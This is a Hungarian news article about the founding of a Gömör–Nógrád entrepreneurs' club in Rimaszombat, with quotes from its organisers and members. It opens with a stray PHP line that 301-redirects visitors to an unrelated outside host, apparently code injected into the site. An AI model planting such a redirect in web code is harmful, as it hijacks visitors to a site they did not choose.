header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> A fejlődés érdekében segítik egymást a gömör-nógrádi vállalkozók
szombat, május 25, 2019

Keresés

A fejlődés érdekében segítik egymást a gömör-nógrádi vállalkozók

2890A Gömör–Nógrádi Vállalkozók Klubja (GNVK) a rimaszombati Tompa Mihály Központ és a Szlovákiai Magyar Fiatal Vállalkozók Szövetsége együttműködésével alakult meg. Céljuk, hogy összekapcsolják a magyar vállalkozókat.

Gömöri vállalkozók első összejövetelére az Euromotelben került sor. A rendszeres vállalkozói találkozók bevezetését tervezik. Az alakuló összejövetelen jelen volt Iván Tamás, a Szlovákiai Magyar Fiatal Vállalkozók Szövetségének elnöke is.

„Találkoztunk a Gömör-Nógrád térségben tevékenykedő vállalkozókkal. Bemutattam a Szlovákiai Magyar Fiatal Vállalkozók Szövetségének a tevékenységét és működését mind országos, mind régiós viszonylatban. Nagyszerű látni, hogy sokan vagyunk, fejlődni akarunk, de ami a legfontosabb, együtt akarjuk ezt elérni" – nyilatkozta a közösségi hálón Iván Tamás.

Elmondta: más járásokban is működnek hasonló klubok, ahol a reggeli kávé melletti beszélgetések alkalmával rengeteg új információval gazdagodnak a résztvevők, egymás tapasztalataiból tanulnak és építik közösségüket. Gömör és Nógrád térsége kis- és középvállalkozóinak együttműködését szeretnék megerősíteni

„A térség egyik fő kitörési lehetősége, ha az itt élő kis- és középvállalkozók megerősödnek, ami magában hordozhatja a bérek emelkedését és új munkahelyek létrehozását, valamint fiataljaink itthon történő boldogulását"– nyilatkozta Cziprusz Zoltán, az egyik kezdeményező. Cziprusz Zoltán kifejtette, a klub a működő vállalkozók fejlődését, mentorálását, bővítését, marketingépítését kívánja támogatni, de a kezdő vállalkozókat is segíteni szeretnék az első lépések megtételében.

Halász Attila rimaszombati vállalkozó ismertette a 2018-ban megrendezett „Az év magyar vállalkozója" versenyen szerzett tapasztalatait, melybe 50 vállalkozó nevezett be. Ő maga a 4. helyezést érte el, s ezáltal mentorprogramban vehetett részt. Két mentort kapott, az egyiket Hernyák László személyében, aki etyeki borász és vendéglátós, továbbá Simon Vilmost, aki egyetemi professzor és Rúzsa Magdi énekes férje. „Sok vállalkozót ismerhettem meg különböző szegmensekből, viszont szépen együtt tudunk működni Komáromtól egészen Királyhelmecig" – fejtette ki Halász Attila.

Mag Fodor Enikő, a Tompa Mihály Központ irodavezetője felhívta a figyelmet az üzleti terv készítésének fontosságára és a pályázati lehetőségek kiaknázására, melyben segítséget tud nyújtani a szervezetük. „Az ajtó minden kedves érdeklődő és fejlődni vágyó előtt nyitva áll. Érdeklődhetnek a Ezt a címet a spamrobotok ellen védjük. Engedélyezze a Javascript használatát, hogy megtekinthesse. e-mail címen vagy személyesen a Tompa Mihály Központban Rimaszombatban, a Fő tér 1. cím alatt, a 105-ös irodában, az Allianz épületében" – mondta.

Szabó Zoltán vállalkozó szerint fontos a vállalkozók közötti kommunikáció, az, hogy ne egymástól elszigetelten működjenek. Elmondta, szerveznek egy körutat a négy járáson belül, hogy minél több érintetthez eljussanak az információk és akár csatlakozhassanak is a klubhoz.

Mint megtudtuk, az első rimaszombati megbeszélésen a résztvevőknek lehetőségük volt egy kérdőív kitöltésére, melyben a vállalkozás fejlődése szempontjából hasznos témaköröket tüntethettek fel. Ezek a további konferenciák témájául szolgálnak majd.

Fotó: Tóth Enikő

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia